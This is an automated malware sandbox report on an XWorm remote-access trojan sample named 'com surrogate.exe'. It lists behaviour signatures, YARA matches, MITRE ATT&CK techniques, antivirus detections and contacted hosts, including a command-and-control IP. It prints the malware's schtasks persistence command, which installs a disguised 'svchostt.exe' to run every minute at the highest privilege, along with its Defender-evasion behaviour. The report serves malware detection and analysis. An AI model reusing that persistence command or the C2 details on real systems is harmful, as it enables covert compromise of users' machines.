                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2b
                      Source: C:\Users\user\Desktop\com surrogate.exe | Queries volume information: C:\Users\user\Desktop\com surrogate.exe VolumeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: com surrogate.exe, 00000000.00000002.2904869847.000000001BB4D000.00000004.00000020.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2891176022.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2904869847.000000001BB7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: com surrogate.exe, type: SAMPLE
Source: Yara match | File source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: com surrogate.exe PID: 1184, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\svchostt.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: com surrogate.exe, type: SAMPLE
Source: Yara match | File source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: com surrogate.exe PID: 1184, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\svchostt.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic, in the order of the original matrix; the number in parentheses is the count shown beside that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); Scheduled Task/Job (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (111); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (151); Process Injection (12); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (541); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (2); System Information Discovery (23); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1575693 | Sample: com surrogate.exe | Start date: 16/12/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: ip-api.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 20 other signatures
  Started: com surrogate.exe (graph badges: 15 6); svchostt.exe; svchostt.exe; 2 other processes

com surrogate.exe
  DNS/IP: 147.185.221.22 (ports 48990, 49791, 49846; SALSGIVERUS, United States); 127.0.0.1 (unknown, unknown); ip-api.com 208.95.112.1 (ports 49730, 80; TUT-ASUS, United States)
  Dropped: C:\Users\user\svchostt.exe, PE32
  Signatures: Protects its processes via BreakOnTermination flag; Adds a directory exclusion to Windows Defender
  Started: powershell.exe (graph badge: 23); powershell.exe (graph badge: 23); powershell.exe (graph badge: 22); 2 other processes

svchostt.exe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

powershell.exe (first instance)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe

powershell.exe (second instance)
  Started: conhost.exe

powershell.exe (third instance)
  Started: conhost.exe

2 other processes
  Started: conhost.exe; conhost.exe

Antivirus detection: initial sample (Source | Detection | Scanner | Label)
com surrogate.exe | 69% | Virustotal |
com surrogate.exe | 82% | ReversingLabs | Win32.Exploit.Xworm
com surrogate.exe | 100% | Avira | TR/Spy.Gen
com surrogate.exe | 100% | Joe Sandbox ML |

Antivirus detection: dropped files (Source | Detection | Scanner | Label)
C:\Users\user\svchostt.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\svchostt.exe | 100% | Joe Sandbox ML |
C:\Users\user\svchostt.exe | 82% | ReversingLabs | Win32.Exploit.Xworm

Antivirus detection: unpacked PE files
No Antivirus matches

Antivirus detection: domains
No Antivirus matches

Antivirus detection: URLs (Source | Detection | Scanner | Label)
http://www.microsoft.i | 0% | Avira URL Cloud | safe
http://www.microsoft.coV | 0% | Avira URL Cloud | safe
147.185.221.22 | 0% | Avira URL Cloud | safe
http://crl.verisign. | 0% | Avira URL Cloud | safe
127.0.0.1 | 0% | Avira URL Cloud | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
ip-api.com | 208.95.112.1 | true | false | | high

Contacted URLs and IPs (Name | Malicious | Antivirus Detection | Reputation)
147.185.221.22 | true | Avira URL Cloud: safe | unknown
127.0.0.1 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.i | powershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
